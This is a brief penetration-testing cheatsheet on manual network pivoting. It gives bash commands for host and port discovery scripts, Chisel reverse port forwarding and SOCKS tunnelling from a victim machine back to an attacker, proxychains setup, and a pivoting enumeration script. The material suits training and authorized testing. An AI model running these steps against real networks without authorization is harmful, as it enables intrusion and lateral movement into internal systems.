# Pivoting Pivoting is a crucial technique in ethical hacking and penetration testing, allowing attackers to extend their reach within a network. The provided Cheatsheet outlines the process of pivoting manually, without relying on tools like Metasploit. Let's break down the steps: #### 1. Discover Active Machines * Use the `host_discovery.sh` script to ping all IPs on the specified network. * Example: ```bash bash host_discovery.sh 10.10.2 ``` #### 2. Discover Open Ports * Utilize the `port_discovery.sh` script to discover open ports on the active machines. * Example: ```bash bash port_discovery.sh ``` #### 3. Port Forwarding with Chisel * Download and use Chisel for port forwarding. Transfer the Chisel binary to the victim machine. * On the attacker's machine: ```bash ./chisel server --reverse -p 1234 ``` * On the victim machine: ```bash ./chisel client :1234 R:80::80 ``` #### 4. Tunneling Networks

* Create a tunnel between networks using Chisel for network pivoting. * On the attacker's machine: ```bash ./chisel client :1234 R:socks ``` * Modify `/etc/proxychains.conf` to use the created tunnel.

#### Automation with Pivoting\_Enum Bash Script * Transfer and execute the `pivoting.sh` script on the victim machine. * Example: ```bash bash pivoting.sh NETWORK ```